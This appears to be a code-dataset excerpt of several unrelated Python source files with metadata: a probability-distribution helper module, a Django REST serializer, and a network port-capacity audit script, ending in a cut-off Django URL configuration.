"line_number": 247, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 253, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 281, "usage_type": "call"}, {"api_name": "numpy.random.shuffle", "line_number": 282, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 282, "usage_type": "attribute"}, {"api_name": "gd.single", "line_number": 292, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 304, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 304, "usage_type": "name"}, {"api_name": "plots.plot2D", "line_number": 313, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.draw", "line_number": 316, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 316, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.pause", "line_number": 317, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 317, "usage_type": "name"}, {"api_name": "numpy.load", "line_number": 323, "usage_type": "call"}, {"api_name": "misc.labels", "line_number": 324, "usage_type": "call"}, {"api_name": "scipy.spatial.distance_matrix", "line_number": 326, "usage_type": "call"}, {"api_name": "scipy.spatial", "line_number": 326, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 333, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 333, "usage_type": "name"}, {"api_name": "numpy.load", "line_number": 337, "usage_type": "call"}, {"api_name": "scipy.spatial.distance_matrix", "line_number": 339, "usage_type": "call"}, {"api_name": "scipy.spatial", "line_number": 339, "usage_type": "name"}, {"api_name": "sklearn.manifold.TSNE", "line_number": 342, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 343, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 343, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 344, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 344, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 345, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 345, "usage_type": "name"}]} +{"seq_id": "37861753", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nHelper non-public API functions for distributions.\n\n\"\"\"\n\n# Standard library\nfrom operator import itemgetter\nimport itertools\n\n# Other\nimport numpy as np\nfrom six.moves import map, range, zip\n\n# dit\nfrom .exceptions import ditException, InvalidDistribution, InvalidOutcome\nfrom .utils import str_product, product_maker\n\n\n\n#\n# This dictionary is a registry (which could, in principle, be updated\n# by users) that maps the outcome class (which is fixed for each distribution)\n# to an outcome constructor. The constructor takes, as input, a tuple\n# created by itertools.product and returns an object of the outcome class.\n# See get_outcome_constructor() and get_produc_func() for more details.\n#\nconstructor_map = {\n str : ''.join,\n}\n\n\n\ndef construct_alphabets(outcomes):\n \"\"\"\n Construct minimal alphabets for each random variable.\n\n In the process, it verifies that each outcome is a sequence and that all\n outcomes have the same length.\n\n Parameters\n ----------\n outcomes : sequence\n A nonempty sequence of outcomes. Each outcome in `outcomes` should\n be a sequence---these are the elements which determine the alphabet\n for each random variable.\n\n Returns\n -------\n alphabets : tuple\n The constructed alphabet for each random variable.\n\n Examples\n --------\n >>> construct_alphabets([(0,1), (1,1)])\n ((0,1), (1,))\n\n Raises\n ------\n ditException\n When not every outcome is a sequence.\n When not all outcomes have the same length.\n\n \"\"\"\n ## Assumption: len(outcomes) > 0\n\n # During validation, each outcome is checked to be of the proper class,\n # length, and also a sequence. However, this function is called before\n # validation and will result in hard to decipher error messages if we\n # don't at least verify that each outcome is a container of the same\n # length.\n\n # Make sure outcomes is a sequence\n try:\n len(outcomes)\n except TypeError:\n raise TypeError('`outcomes` must be a sequence.')\n\n # Make sure each outcome is sized. They really should be sequences,\n # but this check is sufficient for now.\n try:\n lengths = list(map(len, outcomes))\n except TypeError:\n raise ditException('One or more outcomes is not sized. len() fails.')\n else:\n outcome_length = lengths[0]\n\n # Make sure each outcome has the same length.\n equal_lengths = np.alltrue( np.equal( lengths, outcome_length ) )\n if not equal_lengths:\n raise ditException('Not all outcomes have the same length.')\n\n alphabets = _construct_alphabets(outcomes)\n return alphabets\n\ndef _construct_alphabets(outcomes):\n \"\"\"\n Core construction of alphabets. No sanity checks.\n\n \"\"\"\n # Its important that we maintain the order of the sample space.\n # The sample space is given by the Cartesian product of the alphabets.\n # So if the user passes sort=False to the constructor of Distribution,\n # we must make sure to keep the order of the alphabet.\n from dit.utils import OrderedDict\n\n outcome_length = len(outcomes[0])\n alphabets = [OrderedDict() for i in range(outcome_length)]\n for outcome in outcomes:\n for i,symbol in enumerate(outcome):\n alphabets[i][symbol] = True\n\n alphabets = tuple( map(tuple, alphabets) )\n return alphabets\n\ndef get_outcome_ctor(klass):\n \"\"\"\n Helper function to return an outcome constructor from the outcome class.\n\n Usually, this will be the outcome class constructor. However, for some\n classes, such as str, passing in a tuple does not return the desired\n output. For example, str( ('1','0','1') ) yields \"('0', '1', '0')\" when\n we want \"101\". The constructor should work with a tuple as input.\n\n The global `constructor_map` maps classes to their constructor. If the\n class does not exist in the dict, then we use the class constructor.\n\n \"\"\"\n return constructor_map.get(klass, klass)\n\ndef get_product_func(klass):\n \"\"\"\n Helper function to return a product function for the distribution.\n\n The idea is to return something similar to itertools.product. The\n difference is that the iterables should not be tuples, necessarily.\n Rather, they should match whatever the class of the outcomes is.\n\n See the docstring for Distribution.\n\n \"\"\"\n ctor = get_outcome_ctor(klass)\n if ctor == tuple:\n # No need to modify the output of itertools.\n product = itertools.product\n else:\n # Assume the sequence-like constructor can handle tuples as input.\n product = product_maker(ctor)\n\n return product\n\ndef parse_rvs(dist, rvs, rv_names=None, unique=True, sort=True):\n \"\"\"\n Returns the indexes of the random variables in `rvs`.\n\n Parameters\n ----------\n dist : joint distribution\n The joint distribution.\n rvs : list\n The list of random variables. This is either a list of random\n variable indexes or a list of random variable names.\n rv_names : bool\n If `True`, then the elements of `rvs` are treated as random variable\n names. If `False`, then the elements of `rvs` are treated as random\n variable indexes. If `None`, then the value `True` is used if the\n distribution has specified names for its random variables.\n unique : bool\n If `True`, then require that no random variable is repeated in `rvs`.\n If there are any duplicates, an exception is raised. If `False`, random\n variables can be repeated.\n sort : bool\n If `True`, then the output is sorted by the random variable indexes.\n\n Returns\n -------\n rvs : tuple\n A new tuple of the specified random variables, possibly sorted.\n indexes : tuple\n The corresponding indexes of the random variables, possibly sorted.\n\n Raises\n ------\n ditException\n If `rvs` cannot be converted properly into indexes.\n\n \"\"\"\n # Quick check for the empty set. Interpretation: no random variables.\n if len(rvs) == 0:\n return (), ()\n\n # Make sure all random variables are unique.\n if unique and len(set(rvs)) != len(rvs):\n msg = '`rvs` contained duplicates.'\n raise ditException(msg)\n\n # If `rv_names` is None, then its value depends on whether the distribution\n # has names associated with its random variables.\n if rv_names is None:\n if dist._rvs is None:\n # Interpret `rvs` as listing indexes.\n rv_names = False\n else:\n # Interpret `rvs` as listing random variable names.\n rv_names = True\n\n if rv_names:\n # Then `rvs` contained random variable names.\n # We convert these to indexes.\n indexes = []\n for rv in rvs:\n if rv in dist._rvs:\n indexes.append( dist._rvs[rv] )\n\n if len(indexes) != len(rvs):\n msg ='`rvs` contains invalid random variable names.'\n raise ditException(msg)\n else:\n # Then `rvs` contained the set of indexes.\n indexes = rvs\n\n # Make sure all indexes are valid, even if there are duplicates.\n all_indexes = set(range(dist.outcome_length()))\n good_indexes = all_indexes.intersection(indexes)\n if len(good_indexes) != len(set(indexes)):\n msg = '`rvs` contains invalid random variables'\n raise ditException(msg)\n\n # Sort the random variable names (or indexes) by their index.\n out = zip(rvs, indexes)\n if sort:\n out = list(out)\n out.sort(key=itemgetter(1))\n rvs, indexes = list(zip(*out))\n\n return rvs, indexes\n\ndef reorder(outcomes, pmf, sample_space, index=None):\n \"\"\"\n Helper function to reorder outcomes and pmf to match sample_space.\n\n \"\"\"\n if index is None:\n index = dict(zip(outcomes, range(len(outcomes))))\n\n order = [index[outcome] for outcome in sample_space if outcome in index]\n if len(order) != len(outcomes):\n # For example, `outcomes` contains an element not in `sample_space`.\n # For example, `outcomes` contains duplicates.\n raise InvalidDistribution('outcomes and sample_space are not compatible.')\n\n outcomes = [outcomes[i] for i in order]\n pmf = [pmf[i] for i in order]\n new_index = dict(zip(outcomes, range(len(outcomes))))\n return outcomes, pmf, new_index\n\ndef reorder_cp(pmf, outcomes, alphabet, product, index=None, method=None):\n \"\"\"\n Helper function to reorder pmf and outcomes so as to match the sample space.\n\n When the sample space is not stored, explicitly on the distribution, then\n there are two ways to do this:\n 1) Determine the order by generating the entire sample space.\n 2) Analytically calculate the sort order of each outcome.\n\n If the sample space is very large and sparsely populated, then method 2)\n is probably faster. However, it must calculate a number using\n (2**(symbol_orders)).sum(). Potentially, this could be costly. If the\n sample space is small, then method 1) is probably fastest. We'll experiment\n and find a good heuristic.\n\n \"\"\"\n # A map of the elements in `outcomes` to their index in `outcomes`.\n if index is None:\n index = dict(zip(outcomes, range(len(outcomes))))\n\n # The number of elements in the sample space?\n sample_space_size = np.prod( list(map(len, alphabet)) )\n if method is None:\n if sample_space_size > 10000 and len(outcomes) < 1000:\n # Large and sparse.\n method = 'analytic'\n else:\n method = 'generate'\n\n method = 'generate'\n if method == 'generate':\n # Obtain the order from the generated order.\n sample_space = product(*alphabet)\n order = [index[outcome] for outcome in sample_space if outcome in index]\n if len(order) != len(outcomes):\n msg = 'Outcomes and sample_space are not compatible.'\n raise InvalidDistribution(msg)\n outcomes_ = [outcomes[i] for i in order]\n pmf = [pmf[i] for i in order]\n\n # We get this for free: Check that every outcome was in the sample\n # space. Well, its costs us a bit in memory to keep outcomes and\n # outcomes_.\n if len(outcomes_) != len(outcomes):\n # We lost an outcome.\n bad = set(outcomes) - set(outcomes_)\n L = len(bad)\n if L == 1:\n raise InvalidOutcome(bad, single=True)\n elif L:\n raise InvalidOutcome(bad, single=False)\n else:\n outcomes = outcomes_\n\n elif method == 'analytic':\n # Analytically calculate the sort order.\n # Note, this method does not verify that every outcome was in the\n # sample space.\n\n # Construct a lookup from symbol to order in the alphabet.\n alphabet_size = list(map(len, alphabet))\n alphabet_index = [dict(zip(alph, range(size)))\n for alph, size in zip(alphabet, alphabet_size)]\n\n L = len(outcomes[0]) - 1\n codes = []\n for outcome in outcomes:\n idx = 0\n for i,symbol in enumerate(outcome):\n idx += alphabet_index[i][symbol] * (alphabet_size[i])**(L-i)\n codes.append(idx)\n\n # We need to sort the codes now, keeping track of their indexes.\n order = list(zip(codes, range(len(codes))))\n order.sort()\n sorted_codes, order = list(zip(*order))\n outcomes = [outcomes[i] for i in order]\n pmf = [pmf[i] for i in order]\n else:\n raise Exception(\"Method must be 'generate' or 'analytic'\")\n\n new_index = dict(zip(outcomes, range(len(outcomes))))\n\n return pmf, outcomes, new_index\n", "sub_path": "dit/helpers.py", "file_name": "helpers.py", "file_ext": "py", "file_size_in_byte": 11704, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "six.moves.map", "line_number": 84, "usage_type": "call"}, {"api_name": "exceptions.ditException", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.alltrue", "line_number": 91, "usage_type": "call"}, {"api_name": "numpy.equal", "line_number": 91, "usage_type": "call"}, {"api_name": "exceptions.ditException", "line_number": 93, "usage_type": "call"}, {"api_name": "dit.utils.OrderedDict", "line_number": 110, "usage_type": "call"}, {"api_name": "six.moves.range", "line_number": 110, "usage_type": "call"}, {"api_name": "six.moves.map", "line_number": 115, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 147, "usage_type": "attribute"}, {"api_name": "utils.product_maker", "line_number": 150, "usage_type": "call"}, {"api_name": "exceptions.ditException", "line_number": 197, "usage_type": "call"}, {"api_name": "exceptions.ditException", "line_number": 219, "usage_type": "call"}, {"api_name": "six.moves.range", "line_number": 225, "usage_type": "call"}, {"api_name": "exceptions.ditException", "line_number": 229, "usage_type": "call"}, {"api_name": "six.moves.zip", "line_number": 232, "usage_type": "call"}, {"api_name": "operator.itemgetter", "line_number": 235, "usage_type": "call"}, {"api_name": "six.moves.zip", "line_number": 236, "usage_type": "call"}, {"api_name": "six.moves.zip", "line_number": 246, "usage_type": "call"}, {"api_name": "six.moves.range", "line_number": 246, "usage_type": "call"}, {"api_name": "exceptions.InvalidDistribution", "line_number": 252, "usage_type": "call"}, {"api_name": "six.moves.zip", "line_number": 256, "usage_type": "call"}, {"api_name": "six.moves.range", "line_number": 256, "usage_type": "call"}, {"api_name": "six.moves.zip", "line_number": 277, "usage_type": "call"}, {"api_name": "six.moves.range", "line_number": 277, "usage_type": "call"}, {"api_name": "numpy.prod", "line_number": 280, "usage_type": "call"}, {"api_name": "six.moves.map", "line_number": 280, "usage_type": "call"}, {"api_name": "exceptions.InvalidDistribution", "line_number": 295, "usage_type": "call"}, {"api_name": "exceptions.InvalidOutcome", "line_number": 307, "usage_type": "call"}, {"api_name": "exceptions.InvalidOutcome", "line_number": 309, "usage_type": "call"}, {"api_name": "six.moves.map", "line_number": 319, "usage_type": "call"}, {"api_name": "six.moves.zip", "line_number": 320, "usage_type": "call"}, {"api_name": "six.moves.range", "line_number": 320, "usage_type": "call"}, {"api_name": "six.moves.zip", "line_number": 321, "usage_type": "call"}, {"api_name": "six.moves.zip", "line_number": 332, "usage_type": "call"}, {"api_name": "six.moves.range", "line_number": 332, "usage_type": "call"}, {"api_name": "six.moves.zip", "line_number": 334, "usage_type": "call"}, {"api_name": "six.moves.zip", "line_number": 340, "usage_type": "call"}, {"api_name": "six.moves.range", "line_number": 340, "usage_type": "call"}]} +{"seq_id": "233091487", "text": "from django.forms import widgets\nfrom rest_framework import serializers\nfrom snippets.models import Snippet, LANGUAGE_CHOICES, STYLE_CHOICES\nfrom django.contrib.auth.models import User\n\n#하이퍼링크로 API를 연결하기 위해서는 ModelSerializer >> HyperlinkedModelSerializer로 변경해야한다.\nclass SnippetSerializer(serializers.HyperlinkedModelSerializer):\n #직렬화에 ReadOnlyField가 사용될 때 언제나 읽기 전용이므로, 모델의 인스턴스를 업데이트할 때는 사용할 수 없다.\n owner = serializers.ReadOnlyField(source='owner.username') #== CharField(read_only=True)\n highlight = serializers.HyperlinkedIdentityField(view_name = 'snippet-highlight', format='html')\n class Meta:\n model = Snippet #Serializer class의 단축버전\n field = ('url','highlight','owner','title','code','linenos','language','style')\n\n def create(self, validated_data): \n \"\"\"\n 검증한 요청 데이터에 더하여 'owner'필드도 전달한다.\n \"\"\"\n return Snippet.objects.create(**validated_data)\n\n def update(self, instance, validated_data):\n \"\"\"\n 검증한 데이터로 기존 `Snippet` 인스턴스를 업데이트한 후 리턴합니다.\n \"\"\"\n instance.title = validated_data.get('title', instance.title)\n instance.code = validated_data.get('code', instance.code)\n instance.linenos = validated_data.get('linenos', instance.linenos)\n instance.language = validated_data.get('language', instance.language)\n instance.style = validated_data.get('style', instance.style)\n instance.save()\n return instance\n\n#사용자를 보여주는 API\nclass UserSerializer(serializers.HyperlinkedModelSerializer):\n \"\"\"\n snippets은 사용자 모델과 반대방향으로 이루어져있어서\n ModelSerializer에 기본적으로 추가되지 않는다.\n 따라서 명시적으로 필드를 지정해준다.\n \"\"\"\n snippets = serializers.HyperlinkedRelatedField(many=True, view_name = 'snippet-detail',read_only=True)\n\n class Meta:\n model = User\n fields = ('url','username','snippets')", "sub_path": "snippets/serializers.py", "file_name": "serializers.py", "file_ext": "py", "file_size_in_byte": 2159, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "rest_framework.serializers.HyperlinkedModelSerializer", "line_number": 7, "usage_type": "attribute"}, {"api_name": "rest_framework.serializers", "line_number": 7, "usage_type": "name"}, {"api_name": "rest_framework.serializers.ReadOnlyField", "line_number": 9, "usage_type": "call"}, {"api_name": "rest_framework.serializers", "line_number": 9, "usage_type": "name"}, {"api_name": "rest_framework.serializers.HyperlinkedIdentityField", "line_number": 10, "usage_type": "call"}, {"api_name": "rest_framework.serializers", "line_number": 10, "usage_type": "name"}, {"api_name": "snippets.models.Snippet", "line_number": 12, "usage_type": "name"}, {"api_name": "snippets.models.Snippet.objects.create", "line_number": 19, "usage_type": "call"}, {"api_name": "snippets.models.Snippet.objects", "line_number": 19, "usage_type": "attribute"}, {"api_name": "snippets.models.Snippet", "line_number": 19, "usage_type": "name"}, {"api_name": "rest_framework.serializers.HyperlinkedModelSerializer", "line_number": 34, "usage_type": "attribute"}, {"api_name": "rest_framework.serializers", "line_number": 34, "usage_type": "name"}, {"api_name": "snippets.models", "line_number": 40, "usage_type": "name"}, {"api_name": "rest_framework.serializers.HyperlinkedRelatedField", "line_number": 40, "usage_type": "call"}, {"api_name": "rest_framework.serializers", "line_number": 40, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User", "line_number": 43, "usage_type": "name"}]} +{"seq_id": "473159778", "text": "#!/usr/bin/env python\n#===============================================================================\n# AuditPortCapacity\n#\n# Description:\n# Script to open a file (ending in *pyINV.txt), and per the particular hub site,\n# compare the data-rates supported by the optic/card versus the data-rate\n# provided in the circuit description\n#\n# Print and FileWrite flags defaults can be changed in the main method\n#\n# Version:\n# MM.mm DD/MM/YY\n# 00.00 31/07/19 First version\n# 00.01 23/01/20 Collapse common write/print for unit tests into script\n#\n# Example/Usage:\n# Input file from directory: 'NWNWVACROS0-MC100BCRpyInv.json'\n# Output file name: 'NWNWVACROS0-MC100BCRpyInvAudit.json'\n#\n#===============================================================================\nimport json\nimport re\n\nfrom parsers.CreateDictInventory import setINVDictFields, setINVDictCircuitFields\nfrom src.CreateListofSites import createSiteMenuState, buildTIDListFromJSON, createStateMenu\nfrom src.GetHubCircuits import compilePortCircuits\nfrom src.GetProductMatch import getMatchDataRateItem\nfrom src.OpenFileInvMgr import openProcessedFile\nfrom src.ScriptInventory import getVendorSelect, loadJSONFile, getServerSelect\nfrom src.SetMetroNameInv import filterTIDbyState\nfrom src.WriteFileInvMgr import writeLogMessage, writePyOutputFile, writePyJSONFile\n\n\n[KEYSHSLPT, KEYTID, KEYSTATE, KEYPRODUCTID, KEYPARTNUM, KEYVERSION,\n KEYEQUIPNAME, KEYSERIALNUM, KEYCLEI, KEYLOCATION, KEYOPSTATE,\n KEYMFGDATE, KEYSITESSP, KEYSHELF, KEYSLOT, KEYPORT] = setINVDictFields()\n\n[KEYCIRCUIT, KEYCIRCUITTYPE, KEYFACILITY, KEYSTATEPRIM, KEYALARM,\n KEYPROVISION, KEYSERVICEABLE, KEYDISCOVERY, KEYSIDEA, KEYSIDEZ] = setINVDictCircuitFields()\n\ndirINV = 'C:/Users/beclarke/OneDrive - Cox Communications/Documents/Projects/HubInventory'\n\nKEYCLIENT = 'Client'\nKEYTRUNK = 'Trunk'\nmasterKey = 'Cisco_Metros'\nKEYRATEPRODUCTID = 'Rate(ProdID)'\nKEYRATECIRCUIT = 'Rate(Circuit)'\nKEYVALIDITY = 'Validity'\n\n\ndef multiRatePorts():\n dictMultiRate = {'BUILTIN': ['100G', '200G'],\n 'NCS2K-200G-CK-LIC': ['100G', '200G'],\n 'ONS-CFP2-WDM': ['100G', '200G'],\n 'ONS-SE-Z1': ['1G', '2.5G']\n }\n return dictMultiRate\n\n\ndef initPortAudit():\n dictCapacityAudit = {KEYSHSLPT: 'x',\n KEYPRODUCTID: 'x',\n KEYRATEPRODUCTID: 'x',\n KEYCIRCUITTYPE: 'x',\n KEYRATECIRCUIT: 'x',\n KEYVALIDITY: 'x',\n KEYCIRCUIT: 'x'}\n return dictCapacityAudit\n\n\ndef populateCapacityAudit(v, rateProdID, rateCircuit, validity):\n dictPortAudit = initPortAudit()\n dictPortAudit[KEYSHSLPT] = v[KEYSHSLPT]\n dictPortAudit[KEYPRODUCTID] = v[KEYPRODUCTID]\n dictPortAudit[KEYRATEPRODUCTID] = rateProdID\n dictPortAudit[KEYCIRCUIT] = v[KEYCIRCUIT]\n dictPortAudit[KEYCIRCUITTYPE] = v[KEYCIRCUITTYPE]\n dictPortAudit[KEYRATECIRCUIT] = rateCircuit\n dictPortAudit[KEYVALIDITY] = validity\n return dictPortAudit\n\n\ndef checkCapacity(dictPortCircuits, selectSite):\n dictCapacityCheck = {selectSite: {}}\n dictMultiRate = multiRatePorts()\n for k,v in dictPortCircuits[selectSite].items():\n ProductID = v[KEYPRODUCTID]\n Circuit = v[KEYCIRCUIT]\n rateProdID = getMatchDataRateItem(ProductID)\n rateCircuit = getMatchDataRateItem(Circuit)\n if Circuit not in ['No Circuit', 'NO HW'] and ProductID != 'fiber-port':\n if ProductID in dictMultiRate.keys():\n rateProdID = dictMultiRate[ProductID]\n if rateCircuit not in rateProdID:\n dictPortAudit = populateCapacityAudit(v, rateProdID, rateCircuit, 'error')\n dictCapacityCheck[selectSite][k] = dictPortAudit\n elif rateProdID != rateCircuit:\n dictPortAudit = populateCapacityAudit(v, rateProdID, rateCircuit, 'error')\n dictCapacityCheck[selectSite][k] = dictPortAudit\n return dictCapacityCheck\n\n\ndef convertCapCheckToList(dictCheckCap, selectSite):\n caps = [list(v.values()) for k, v in dictCheckCap[selectSite].items()]\n [item.insert(0, selectSite) for item in caps]\n header = [list(v.keys()) for k, v in dictCheckCap[selectSite].items()][0]\n header.insert(0, 'TID')\n listCheckCap = []\n listCheckCap.append(header)\n listCheckCap.extend(caps)\n return listCheckCap\n\n\ndef compileCapacityCheck(jsonTID, selectSite, selectVendor):\n dictPortCircuits = compilePortCircuits(jsonTID, selectSite, selectVendor)\n dictAllCap = checkCapacity(dictPortCircuits, selectSite)\n try:\n listCheckCap = convertCapCheckToList(dictAllCap, selectSite)\n except IndexError:\n dictAllCap[selectSite]['None'] = initPortAudit()\n listCheckCap = convertCapCheckToList(dictAllCap, selectSite)\n return dictAllCap, listCheckCap\n\n\ndef printCapCheckListToConsole(listCheckCap):\n formatString = '{:24} {:8} {:20} {:12} {:14} {:13} {:8} {:80} '\n for item in listCheckCap:\n print(formatString.format(*item))\n print('\\n')\n\n\ndef auditCapacityServerUnit(writeToFileFlag=False, printFlag=True):\n # call sub to read in file\n fileName, fileINV, dirINV = openProcessedFile(fileXt='*pyInv.json')\n if fileName == '': return\n writeLogMessage('Auditing capacity for sites in ' + fileName, dirINV)\n\n jsonSrc = loadJSONFile(fileINV)\n selectVendor = getVendorSelect(fileINV)\n selectServer = getServerSelect(fileINV)\n dictAllCap = {selectServer: {}}\n listAllCap = []\n\n # Get site list to accurately count totals per site\n listSiteTID = buildTIDListFromJSON(fileINV)\n for selectSite in listSiteTID:\n writeLogMessage('Auditing port capacity for ' + selectSite, dirINV)\n # run for each distinct site in the file\n jsonTID = jsonSrc[selectSite]\n dictCheckCap, listCheckCap = compileCapacityCheck(jsonTID, selectSite, selectVendor)\n if 'None' not in dictCheckCap[selectSite].keys():\n dictAllCap[selectServer].update(dictCheckCap)\n listAllCap.extend(listCheckCap[1:])\n\n listAllCap.insert(0, listCheckCap[0])\n fileXts = ['pyInvAuditAll.txt', 'pyInvAuditAll.json']\n auditCapacityEnd(dictAllCap, listAllCap, fileName, selectSite,\n fileXts, writeToFileFlag, printFlag)\n\n\ndef auditCapacityStateUnit(writeToFileFlag=False, printFlag=True):\n # call sub to read in file\n fileName, fileINV, dirINV = openProcessedFile(fileXt='*pyInv.json')\n if fileName == '': return\n selectState = createStateMenu()\n if selectState is None: return\n writeLogMessage('Auditing capacity for sites in ' + fileName, dirINV)\n\n jsonSrc = loadJSONFile(fileINV)\n selectVendor = getVendorSelect(fileINV)\n selectServer = getServerSelect(fileINV)\n dictAllCap = {selectServer: {}}\n listAllCap = []\n\n # Get site list to accurately count totals per site\n listSiteTID = buildTIDListFromJSON(fileINV)\n listStateTID = filterTIDbyState(listSiteTID, selectState)\n for selectSite in listStateTID:\n writeLogMessage('Auditing port capacity for ' + selectSite, dirINV)\n # run for each distinct site in the file\n jsonTID = jsonSrc[selectSite]\n dictCheckCap, listCheckCap = compileCapacityCheck(jsonTID, selectSite, selectVendor)\n if 'None' not in dictCheckCap[selectSite].keys():\n dictAllCap[selectServer].update(dictCheckCap)\n listAllCap.extend(listCheckCap[1:])\n\n listAllCap.insert(0, listCheckCap[0])\n fileXts = ['pyInvAudit' + selectState + '.txt',\n 'pyInvAudit' + selectState + '.json']\n auditCapacityEnd(dictAllCap, listAllCap, fileName, selectSite,\n fileXts, writeToFileFlag, printFlag)\n\n\ndef auditCapacityUnit(writeToFileFlag=False, printFlag=True):\n # call sub to read in file\n fileName, fileINV, dirINV = openProcessedFile(fileXt='*pyInv.json')\n if fileName == '': return\n selectSite = createSiteMenuState(fileINV, dirINV)\n if selectSite is None: return\n\n jsonSrc = loadJSONFile(fileINV)\n jsonTID = jsonSrc[selectSite]\n selectVendor = getVendorSelect(fileINV)\n writeLogMessage('Auditing Port Circuits for ' + selectSite, dirINV)\n\n dictCheckCap, listCheckCap = compileCapacityCheck(jsonTID, selectSite, selectVendor)\n fileXts = ['pyInvAudit.txt', 'pyInvAudit.json']\n auditCapacityEnd(dictCheckCap, listCheckCap, fileName, selectSite,\n fileXts, writeToFileFlag, printFlag)\n\n\ndef auditCapacityEnd(dictCap, listCap, fileName, selectSite,\n fileXts, writeToFileFlag=False, printFlag=True):\n if printFlag:\n print(json.dumps(dictCap, indent=4))\n # printCapCheckListToConsole(listCheckCap)\n\n fileName = fileName + '_' + selectSite\n if writeToFileFlag:\n writePyOutputFile(dirINV, fileName, listCap, fileXts[0])\n writePyJSONFile(dirINV, fileName, dictCap, fileXts[1])\n else:\n writeQuery = input('Do you wish to save the Audit file (Y/N)?:')\n if re.search('y', writeQuery) or re.search('Y', writeQuery):\n writePyOutputFile(dirINV, fileName, listCap, fileXts[0])\n writePyJSONFile(dirINV, fileName, dictCap, fileXts[1])\n\n writeLogMessage('Script complete.', dirINV)\n\n\ndef main(writeToFileFlag=False, printFlag=True):\n # auditCapacityUnit(writeToFileFlag, printFlag)\n # auditCapacityServerUnit(writeToFileFlag, printFlag)\n auditCapacityStateUnit(writeToFileFlag, printFlag)\n\n\nif __name__ == '__main__':\n main()\n", "sub_path": "src/AuditPortCapacity.py", "file_name": "AuditPortCapacity.py", "file_ext": "py", "file_size_in_byte": 9577, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "parsers.CreateDictInventory.setINVDictFields", "line_number": 37, "usage_type": "call"}, {"api_name": "parsers.CreateDictInventory.setINVDictCircuitFields", "line_number": 40, "usage_type": "call"}, {"api_name": "src.GetProductMatch.getMatchDataRateItem", "line_number": 90, "usage_type": "call"}, {"api_name": "src.GetProductMatch.getMatchDataRateItem", "line_number": 91, "usage_type": "call"}, {"api_name": "src.GetHubCircuits.compilePortCircuits", "line_number": 116, "usage_type": "call"}, {"api_name": "src.OpenFileInvMgr.openProcessedFile", "line_number": 135, "usage_type": "call"}, {"api_name": "src.WriteFileInvMgr.writeLogMessage", "line_number": 137, "usage_type": "call"}, {"api_name": "src.ScriptInventory.loadJSONFile", "line_number": 139, "usage_type": "call"}, {"api_name": "src.ScriptInventory.getVendorSelect", "line_number": 140, "usage_type": "call"}, {"api_name": "src.ScriptInventory.getServerSelect", "line_number": 141, "usage_type": "call"}, {"api_name": "src.CreateListofSites.buildTIDListFromJSON", "line_number": 146, "usage_type": "call"}, {"api_name": "src.WriteFileInvMgr.writeLogMessage", "line_number": 148, "usage_type": "call"}, {"api_name": "src.OpenFileInvMgr.openProcessedFile", "line_number": 164, "usage_type": "call"}, {"api_name": "src.CreateListofSites.createStateMenu", "line_number": 166, "usage_type": "call"}, {"api_name": "src.WriteFileInvMgr.writeLogMessage", "line_number": 168, "usage_type": "call"}, {"api_name": "src.ScriptInventory.loadJSONFile", "line_number": 170, "usage_type": "call"}, {"api_name": "src.ScriptInventory.getVendorSelect", "line_number": 171, "usage_type": "call"}, {"api_name": "src.ScriptInventory.getServerSelect", "line_number": 172, "usage_type": "call"}, {"api_name": "src.CreateListofSites.buildTIDListFromJSON", "line_number": 177, "usage_type": "call"}, {"api_name": "src.SetMetroNameInv.filterTIDbyState", "line_number": 178, "usage_type": "call"}, {"api_name": "src.WriteFileInvMgr.writeLogMessage", "line_number": 180, "usage_type": "call"}, {"api_name": "src.OpenFileInvMgr.openProcessedFile", "line_number": 197, "usage_type": "call"}, {"api_name": "src.CreateListofSites.createSiteMenuState", "line_number": 199, "usage_type": "call"}, {"api_name": "src.ScriptInventory.loadJSONFile", "line_number": 202, "usage_type": "call"}, {"api_name": "src.ScriptInventory.getVendorSelect", "line_number": 204, "usage_type": "call"}, {"api_name": "src.WriteFileInvMgr.writeLogMessage", "line_number": 205, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 216, "usage_type": "call"}, {"api_name": "src.WriteFileInvMgr.writePyOutputFile", "line_number": 221, "usage_type": "call"}, {"api_name": "src.WriteFileInvMgr.writePyJSONFile", "line_number": 222, "usage_type": "call"}, {"api_name": "re.search", "line_number": 225, "usage_type": "call"}, {"api_name": "src.WriteFileInvMgr.writePyOutputFile", "line_number": 226, "usage_type": "call"}, {"api_name": "src.WriteFileInvMgr.writePyJSONFile", "line_number": 227, "usage_type": "call"}, {"api_name": "src.WriteFileInvMgr.writeLogMessage", "line_number": 229, "usage_type": "call"}]} +{"seq_id": "535830332", "text": "from django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n\turl(r'^$', views.index),\n\turl(r'^main$', views.index),\n\turl(r'^register$', views.register),\n\turl(r'^login$', views.login),\n\turl(r'^travels$', views.travels),\n\turl(r'^logout$', views.logout),\n\turl(r'^add_trip$', views.add_trip), #displays new trip page\n\turl(r'^new_trip$', views.new_trip), #proccess new 